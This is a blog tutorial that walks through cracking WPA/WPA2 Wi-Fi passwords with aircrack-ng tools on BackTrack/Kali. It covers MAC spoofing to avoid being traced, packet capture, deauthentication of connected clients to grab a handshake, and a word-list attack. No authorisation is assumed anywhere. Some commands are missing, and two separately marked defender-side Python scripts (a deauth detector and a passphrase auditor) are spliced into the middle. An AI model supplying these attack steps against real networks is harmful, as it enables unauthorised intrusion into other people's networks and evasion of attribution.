Saturday, 6 September 2014

WPA / WPA2 cracking [BackTrack] / Kali Linux

Here I will explain how to crack a WPA or WPA2 network. 

Using the Linux distribution called BackTrack 5, available from the following link:



• BackTrack on CD or USB 

• A computer with a compatible 802.11 WLAN card 

• A wireless access point or Wi-Fi router using WPA / WPA2 encryption 

• A word list (search Google, you will find many) 


1. Start BackTrack 

Boot from your USB stick or your CD / DVD (depending on which BackTrack version you have). 

Now start BackTrack. 

After the boot process has finished you have to type:


and then:


Press Enter to get to the graphical interface of BackTrack. 


2. Now we start! 

Open a shell. 

Type:


to find out what your Wi-Fi adapter is called. 


3. Change the MAC address 

Now you know the name of your adapter (in my case it is wlan0, so from now on I use wlan0 as the interface). 

You should change your MAC address so that it cannot be traced back to you later.

Code below:

airmon-ng stop wlan0 

ifconfig wlan0 down 

macchanger --mac (any MAC) wlan0 

airmon-ng start wlan0 

It should look like this: 

airmon-ng stop wlan0 

ifconfig wlan0 down 

macchanger --mac 00:11:22:33:44:55 wlan0 

airmon-ng start wlan0 


4. Choose a network

Now you type in the same shell:


Now it scans for networks. 

On the left we see the BSSID, which is roughly the MAC address of the router. 

Once the desired network has been found, we press Ctrl + C to stop the whole process. 

Now copy the BSSID of the desired network.

5. Let's go

Now you have to find the channel.


airodump-ng -c (channel) -w (filename; it does not matter what, just take wpa or something easy to remember) --bssid (BSSID) wlan0 

We write the data we receive into a file. 

For example: 

airodump-ng -c 11 -w wpa --bssid 00:14:F8:4F:14:1A wlan0 

With this command we write all data received from our Wi-Fi network XY, with the BSSID 00:14:F8:4F:14:1A and transmitting on channel 11, into the file 'wpa-01.cap'. 

On WPA/WPA2 it is not possible to decrypt the password directly, as it is on WEP. 

For this we need a 'handshake'. 


6. The handshake 

Our client is connected to the router, and with every new connection the password is exchanged in encrypted form.

We might wait (likely) forever for our client to reconnect.

But we do not have to.

In our shell we see at the bottom who else is online. If we get a handshake,

we see it at the top right of the shell: the word 'handshake' appears there. 

We now open a new shell to kick our clients out so that they have to reconnect. 

And type: 

aireplay-ng -0 5 -a (BSSID) wlan0 

5 is the number of attempts we want to make. 

But it is not guaranteed that this works, because newer routers no longer allow it. 

How do we get the client to disconnect?

It is relatively simple. We tell the router: "Hello, I'm user XY and would like to log out." 

So we throw the client out:  

aireplay-ng -0 1 -a (BSSID) -c (client MAC) wlan0 

The client MAC is shown at the bottom of shell 1. 

Now we should have a handshake. 
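The forced disconnect in this step is done with ordinary, unauthenticated 802.11 management frames, which is also what makes it easy to spot from the network owner's side. The following is an added example for the defender (it is not part of the tutorial and not aircrack-ng code): a small detector that counts deauthentication frames per (BSSID, destination) pair in a sliding time window and raises one alert when a burst appears. The frame tuple format, the addresses and the trace are constructed assumptions standing in for what a capture parser or wireless IDS would deliver.

```python
"""Detect bursts of 802.11 deauthentication frames (defender-side check).

Added example, not from the tutorial. Input format is an assumption for
this example: one tuple per decoded management frame,
    (timestamp_seconds, subtype, bssid, destination_mac)
as a capture parser or wireless IDS would hand them over.
"""
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample addresses (not real devices).
AP = "02:00:00:00:aa:01"
CLIENT = "02:00:00:00:bb:02"

# Constructed sample trace: normal traffic, one genuine deauth when the
# client leaves, then a burst of eight broadcast deauths within 0.35 s,
# the pattern a forced-disconnect run like the one above produces.
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, BROADCAST),
    (0.10, "data", AP, CLIENT),
    (0.50, "deauth", AP, CLIENT),   # one legitimate deauth: client leaving
    (1.00, "beacon", AP, BROADCAST),
] + [(5.00 + 0.05 * i, "deauth", AP, BROADCAST) for i in range(8)]


def detect_deauth_bursts(frames, window_s=2.0, threshold=5):
    """Return alerts as (bssid, destination, first_ts, count) tuples.

    Frames are processed in timestamp order. For every (bssid, destination)
    pair a sliding window holds the timestamps of recent deauth frames; the
    first time the window contains at least `threshold` frames, one alert is
    raised for that pair. A single deauth from a client that really leaves
    never reaches the threshold.
    """
    windows = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        key = (bssid.lower(), dst.lower())
        window = windows[key]
        window.append(ts)
        # Drop timestamps that fell out of the window.
        while ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], window[0], len(window)))
    return alerts


if __name__ == "__main__":
    for bssid, dst, first_ts, count in detect_deauth_bursts(SAMPLE_FRAMES):
        target = "broadcast (all clients)" if dst == BROADCAST else dst
        print(f"deauth burst from {bssid} to {target}: "
              f"{count} frames starting at t={first_ts:.2f}s")
```

Running the script on the constructed trace reports one burst (from the AP's BSSID to the broadcast address) and stays silent on the single genuine deauth. The threshold and window are deliberately conservative; tune them to the normal churn of your own network. The "newer routers no longer allow it" remark above corresponds to 802.11w Protected Management Frames, under which a client discards deauthentication frames that are not authenticated with the session key, so enabling PMF on the access point is the mitigation to pair with this detection.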


7. Crack it! 

Once we have a handshake, we can close all our shells undisturbed and open a new one. 

In this one we type: 

aircrack-ng (filename)-01.cap 

Now we need the word list.

We now go to our word list, which is for example here: 

/home/wordlists 

In my example the word list is called 'Wlist.txt'. 

Now we enter the following in the shell:

aircrack-ng (filename)-01.cap -w (path to the word list) 

For me it would look like this:

aircrack-ng wpa-01.cap -w /home/wordlists/Wlist.txt 

Now the program tests all words to see whether they match the encrypted handshake. 

If the password is found, it is shown and you are done.
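The last step only succeeds when the network's passphrase is in the word list, so from the network owner's side the useful check is to audit the passphrase the same way before someone else does. The following is an added example (not from the tutorial and not aircrack-ng code): it loads a word list, reports why a passphrase would fall to a word-list run (too short, verbatim in the list, or a list entry with digits appended) and generates a random replacement. The sample word list and the passphrases are constructed stand-ins for the 'Wlist.txt' above.

```python
"""Audit a WPA/WPA2 passphrase against a word list (defender-side check).

Added example, not from the tutorial. The word list below is a constructed
sample standing in for a file such as /home/wordlists/Wlist.txt.
"""
import secrets
import string

# Constructed sample word list (a real one has millions of lines).
SAMPLE_WORDLIST = ["password", "password123", "12345678", "letmein", "qwertyuiop"]


def normalise(word):
    """Lower-case and strip a candidate so comparisons are consistent."""
    return word.strip().lower()


def load_wordlist(lines):
    """Build a set of normalised candidates from an iterable of lines
    (e.g. an open file object or a list of strings)."""
    return {normalise(line) for line in lines if line.strip()}


def audit_passphrase(passphrase, wordlist, min_len=16):
    """Return a list of findings; an empty list means the passphrase passed.

    Checks, in order: the WPA length rule (8-63 characters), a local
    minimum length policy, a verbatim word-list hit, and the common
    'dictionary word plus trailing digits' pattern.
    """
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("not a valid WPA passphrase length (8-63 characters)")
    if len(passphrase) < min_len:
        findings.append(f"shorter than {min_len} characters")
    candidate = normalise(passphrase)
    if candidate in wordlist:
        findings.append("appears verbatim in the word list")
    stem = candidate.rstrip(string.digits)
    if stem != candidate and stem in wordlist:
        findings.append("word-list entry followed by digits")
    return findings


def generate_passphrase(length=24):
    """Return a random alphanumeric passphrase from the OS CSPRNG."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    wordlist = load_wordlist(SAMPLE_WORDLIST)
    for candidate in ["password123", "letmein2014", "short", generate_passphrase()]:
        findings = audit_passphrase(candidate, wordlist)
        verdict = "; ".join(findings) if findings else "OK"
        print(f"{candidate!r}: {verdict}")
```

To audit against a real list, pass an open file to `load_wordlist` (`load_wordlist(open("/home/wordlists/Wlist.txt", encoding="utf-8", errors="ignore"))`); the set fits in memory for lists of a few million entries. A 24-character random passphrase is far outside what any word list or mangling rule produces, which is the whole point of the last check.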



